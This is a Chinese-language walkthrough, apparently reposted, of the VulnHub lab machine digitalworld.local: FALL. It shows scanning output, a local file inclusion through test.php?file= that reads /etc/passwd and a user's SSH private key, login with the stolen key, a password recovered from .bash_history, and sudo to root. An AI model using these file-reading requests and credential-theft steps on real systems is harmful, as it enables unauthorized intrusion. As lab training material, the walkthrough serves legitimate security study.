當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

靶机渗透练习60-digitalworld.local：FALL

發布時間：2023/12/14 编程问答 41 豆豆

生活随笔收集整理的這篇文章主要介紹了靶机渗透练习60-digitalworld.local：FALL 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

靶機描述

靶機地址：https://www.vulnhub.com/entry/digitalworldlocal-fall,726/

Description

To celebrate the fifth year that the author has survived his infosec career, a new box has been born! This machine resembles a few different machines in the PEN-200 environment (making it yet another OSCP-like box). More enumeration practice indeed!

If you MUST have hints for this machine: FALL is (#1): what happens when one gets careless, (#2): important in making sure we can get up, (#3): the author’s favourite season since it is a season of harvest.

一、搭建靶機環境

攻擊機Kali：

IP地址：192.168.9.7

靶機：

IP地址：192.168.9.56

注：靶機與Kali的IP地址只需要在同一局域網即可（同一個網段,即兩虛擬機處于同一網絡模式）

該靶機環境搭建如下

將下載好的靶機環境，導入 VritualBox，設置為 Host-Only 模式

將 VMware 中橋接模式網卡設置為 VritualBox 的 Host-only

二、實戰

2.1網絡掃描

2.1.1 啟動靶機和Kali后進行掃描

方法一、arp-scan -I eth0 -l （指定網卡掃）

arp-scan -I eth0 -l

? FALL arp-scan -I eth0 -l Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.9.2 08:00:27:ed:5e:87 PCS Systemtechnik GmbH 192.168.9.56 08:00:27:14:da:40 PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.945 seconds (131.62 hosts/sec). 2 responded

方法二、masscan 掃描的網段 -p 掃描端口號

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 網卡-r 網段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你們補充

2.1.2 查看靶機開放的端口

使用nmap -A -sV -T4 -p- 靶機ip查看靶機開放的端口

? FALL nmap -A -sV -T4 -p- 192.168.9.56 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 09:26 CST Nmap scan report for bogon (192.168.9.56) Host is up (0.00036s latency). Not shown: 65387 filtered tcp ports (no-response), 135 filtered tcp ports (host-prohibited) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.8 (protocol 2.0) | ssh-hostkey: | 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA) | 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA) |_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519) 80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. |_http-title: Good Tech Inc's Fall Sales - Home 111/tcp closed rpcbind 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US | Subject Alternative Name: DNS:localhost.localdomain | Not valid before: 2019-08-15T03:51:33 |_Not valid after: 2020-08-19T05:31:33 |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 | tls-alpn: |_ http/1.1 | http-robots.txt: 1 disallowed entry |_/ |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. |_http-title: Good Tech Inc's Fall Sales - Home 445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA) 3306/tcp open mysql MySQL (unauthorized) 8000/tcp closed http-alt 8080/tcp closed http-proxy 8443/tcp closed https-alt 9090/tcp open http Cockpit web service 162 - 188 |_http-title: Did not follow redirect to https://bogon:9090/ 10080/tcp closed amanda 10443/tcp closed cirrossp MAC Address: 08:00:27:14:DA:40 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 5.X OS CPE: cpe:/o:linux:linux_kernel:5 OS details: Linux 5.0 - 5.4 Network Distance: 1 hop Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results: |_clock-skew: mean: 10h19m57s, deviation: 4h02m29s, median: 7h59m57s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.8.10) | Computer name: fall | NetBIOS computer name: FALL\x00 | Domain name: \x00 | FQDN: fall |_ System time: 2022-03-29T02:29:15-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-03-29T09:29:26 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not requiredTRACEROUTE HOP RTT ADDRESS 1 0.36 ms bogon (192.168.9.56)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 174.82 seconds

開放了以下端口：

22—ssh—OpenSSH 7.8 (protocol 2.0)

80—http— Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips

139—netbios-ssn—Samba smbd 3.X - 4.X (workgroup: SAMBA)

443—ssl/http—Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)

445—netbios-ssn—Samba smbd 4.8.10 (workgroup: SAMBA)

3306—mysql—MySQL (unauthorized)

9090—http—Cockpit web service 162 - 188

80端口發現CMS Made Simple

2.2枚舉漏洞

2.2.1 80 端口分析

訪問:http://192.168.9.56/

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-i719tpvc-1650417749403)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220329101153535.png)]

發現用戶qiu，同時發現網站webroot目錄下有test測試腳本

掃描一下目錄:gobuster dir -u http://192.168.9.56 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

? FALL gobuster dir -u http://192.168.9.56 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.9.56 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,php,html,zip,bak [+] Timeout: 10s =============================================================== 2022/03/29 10:15:52 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 213] /.hta.php (Status: 403) [Size: 217] /.hta.html (Status: 403) [Size: 218] /.hta.zip (Status: 403) [Size: 217] /.htaccess.bak (Status: 403) [Size: 222] /.htpasswd.html (Status: 403) [Size: 223] /.htpasswd (Status: 403) [Size: 218] /.htaccess (Status: 403) [Size: 218] /.hta.bak (Status: 403) [Size: 217] /.htaccess.txt (Status: 403) [Size: 222] /.htpasswd.zip (Status: 403) [Size: 222] /.hta.txt (Status: 403) [Size: 217] /.htaccess.php (Status: 403) [Size: 222] /.htpasswd.bak (Status: 403) [Size: 222] /.htaccess.html (Status: 403) [Size: 223] /.htpasswd.txt (Status: 403) [Size: 222] /.htaccess.zip (Status: 403) [Size: 222] /.htpasswd.php (Status: 403) [Size: 222] /admin.pl.html (Status: 403) [Size: 222] /admin.pl.zip (Status: 403) [Size: 221] /admin.pl.bak (Status: 403) [Size: 221] /admin.pl (Status: 403) [Size: 217] /admin.cgi.bak (Status: 403) [Size: 222] /admin.pl.txt (Status: 403) [Size: 221] /admin.cgi.txt (Status: 403) [Size: 222] /admin.cgi.html (Status: 403) [Size: 223] /admin.cgi (Status: 403) [Size: 218] /admin.cgi.zip (Status: 403) [Size: 222] /admin (Status: 301) [Size: 234] [--> http://192.168.9.56/admin/] /AT-admin.cgi.txt (Status: 403) [Size: 225] /AT-admin.cgi.html (Status: 403) [Size: 226] /AT-admin.cgi.zip (Status: 403) [Size: 225] /assets (Status: 301) [Size: 235] [--> http://192.168.9.56/assets/] /AT-admin.cgi (Status: 403) [Size: 221] /AT-admin.cgi.bak (Status: 403) [Size: 225] /cachemgr.cgi.zip (Status: 403) [Size: 225] /cachemgr.cgi.bak (Status: 403) [Size: 225] /cachemgr.cgi.txt (Status: 403) [Size: 225] /cachemgr.cgi (Status: 403) [Size: 221] /cachemgr.cgi.html (Status: 403) [Size: 226] /cgi-bin/ (Status: 403) [Size: 217] /cgi-bin/.html (Status: 403) [Size: 222] /config.php (Status: 200) [Size: 0] /doc (Status: 301) [Size: 232] [--> http://192.168.9.56/doc/] /error.html (Status: 200) [Size: 80] /favicon.ico (Status: 200) [Size: 1150] /index.php (Status: 200) [Size: 8331] /index.php (Status: 200) [Size: 8331] /lib (Status: 301) [Size: 232] [--> http://192.168.9.56/lib/] /missing.html (Status: 200) [Size: 168] /modules (Status: 301) [Size: 236] [--> http://192.168.9.56/modules/] /phpinfo.php (Status: 200) [Size: 17] /phpinfo.php (Status: 200) [Size: 17] /robots.txt (Status: 200) [Size: 79] /robots.txt (Status: 200) [Size: 79] /test.php (Status: 200) [Size: 80] /tmp (Status: 301) [Size: 232] [--> http://192.168.9.56/tmp/] /uploads (Status: 301) [Size: 236] [--> http://192.168.9.56/uploads/]=============================================================== 2022/03/29 10:15:56 Finished =============================================================== ? FALL

發現test.php

訪問：http://192.168.9.56/test.php

提示缺少get參數

2.3漏洞利用

2.3.1 wfuzz測試文件包含漏洞

使用wfuzz進行模糊測試參數，成功得到file參數

? FALL wfuzz -u "http://192.168.9.56/test.php?FUZZ=aaa" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 80 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************Target: http://192.168.9.56/test.php?FUZZ=aaa Total requests: 4711===================================================================== ID Response Lines Word Chars Payload =====================================================================000001783: 200 0 L 0 W 0 Ch "file" Total time: 2.775117 Processed Requests: 4711 Filtered Requests: 4710 Requests/sec.: 1697.585

測試一下是否可執行

view-source:http://192.168.9.56/test.php?file=/etc/passwd

成功讀取/etc/passwd文件內容，同時發現qiu用戶存在，且權限為1000

嘗試查看qiu的 ssh 密鑰：view-source:http://192.168.9.56/test.php?file=/home/qiu/.ssh/id_rsa

成功讀取其內容為

將其保存到本地文件id_rsa

嘗試ssh秘鑰登錄

? FALL ssh qiu@192.168.9.56 -i id_rsa The authenticity of host '192.168.9.56 (192.168.9.56)' can't be established. ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.9.56' (ED25519) to the list of known hosts. Web console: https://FALL:9090/Last login: Sun Sep 5 19:28:51 2021 [qiu@FALL ~]$

成功登錄

2.4權限提升

2.4.1 信息收集

常規信息收集

[qiu@FALL ~]$ id uid=1000(qiu) gid=1000(qiu) 組=1000(qiu),10(wheel) [qiu@FALL ~]$ sudo -l [sudo] qiu 的密碼：對不起，請重試。 [sudo] qiu 的密碼：對不起，請重試。 [sudo] qiu 的密碼： sudo: 3 次錯誤密碼嘗試 [qiu@FALL ~]$ ls -al 總用量 24 drwxr-xr-x. 3 qiu qiu 128 5月 21 2021 . drwxr-xr-x. 3 root root 17 8月 14 2019 .. -rw------- 1 qiu qiu 292 9月 5 2021 .bash_history -rw-r--r--. 1 qiu qiu 18 3月 15 2018 .bash_logout -rw-r--r--. 1 qiu qiu 193 3月 15 2018 .bash_profile -rw-r--r--. 1 qiu qiu 231 3月 15 2018 .bashrc -rw-r--r-- 1 qiu qiu 27 5月 21 2021 local.txt -rw-rw-r-- 1 qiu qiu 38 5月 21 2021 reminder drwxr-xr-x 2 qiu qiu 61 5月 21 2021 .ssh

在 shell 中尋找 suid 程序：find / -perm -u=s -type f 2>/dev/null

[qiu@FALL ~]$ find / -perm -u=s -type f 2>/dev/null /usr/bin/fusermount /usr/bin/chage /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/ksu /usr/bin/pkexec /usr/bin/passwd /usr/bin/crontab /usr/bin/at /usr/bin/chfn /usr/bin/chsh /usr/bin/sudo /usr/sbin/pam_timestamp_check /usr/sbin/unix_chkpwd /usr/sbin/userhelper /usr/sbin/usernetctl /usr/sbin/mount.nfs /usr/sbin/mtr-packet /usr/lib/polkit-1/polkit-agent-helper-1 /usr/libexec/dbus-1/dbus-daemon-launch-helper /usr/libexec/cockpit-session /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache

在https://gtfobins.github.io/中查找了一下，沒有可以直接利用的

看一下.bash_history文件內容

[qiu@FALL ~]$ cat .bash_history ls -al cat .bash_history rm .bash_history echo "remarkablyawesomE" | sudo -S dnf update ifconfig ping www.google.com ps -aux ps -ef | grep apache env env > env.txt rm env.txt lsof -i tcp:445 lsof -i tcp:80 ps -ef lsof -p 1930 lsof -p 2160 rm .bash_history exit ls -al cat .bash_history exit [qiu@FALL ~]$

發現字符串remarkablyawesomE，猜測是密碼

再次嘗試sudo -l

[qiu@FALL ~]$ sudo -l [sudo] qiu 的密碼：匹配 %2$s 上 %1$s 的默認條目：!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATELC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERICLC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin用戶 qiu 可以在 FALL 上運行以下命令：(ALL) ALL [qiu@FALL ~]$

的確是qiu的密碼

進行sudo提權

[qiu@FALL ~]$ sudo su [root@FALL qiu]# cd /root [root@FALL ~]# ls -al 總用量 40 dr-xr-x---. 3 root root 206 9月 5 2021 . dr-xr-xr-x. 17 root root 244 5月 21 2021 .. -rw-------. 1 root root 3963 8月 14 2019 anaconda-ks.cfg -rw------- 1 root root 57 9月 5 2021 .bash_history -rw-r--r--. 1 root root 18 2月 9 2018 .bash_logout -rw-r--r--. 1 root root 176 2月 9 2018 .bash_profile -rw-r--r--. 1 root root 176 2月 9 2018 .bashrc -rw-r--r--. 1 root root 100 2月 9 2018 .cshrc -rw-------. 1 root root 3151 8月 14 2019 original-ks.cfg ---------- 1 root root 30 5月 21 2021 proof.txt -r-------- 1 root root 452 8月 30 2021 remarks.txt drwx------ 2 root root 25 9月 5 2021 .ssh -rw-r--r--. 1 root root 129 2月 9 2018 .tcshrc [root@FALL ~]# cat proof.txt Congrats on a root shell! :-) [root@FALL ~]#

提權成功，并拿到flag

總結

本靶機比較簡單，通過目錄掃描結合前端頁面相關信息直接定位test.php，再通過wfuzz工具進行模糊測試得到參數file，通過查看ssh秘鑰文件內容并保存至本地，然后ssh秘鑰登錄，查看.bash_history文件內容得到用戶密碼，最后sudo提權

發現主機

信息收集

目錄掃描

wfuzz模糊測試

ssh秘鑰登錄

sudo提權

總結

以上是生活随笔為你收集整理的靶机渗透练习60-digitalworld.local：FALL的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：受限用户如何禁用迈克菲等开机自动启动软件
下一篇：数据库查重复记录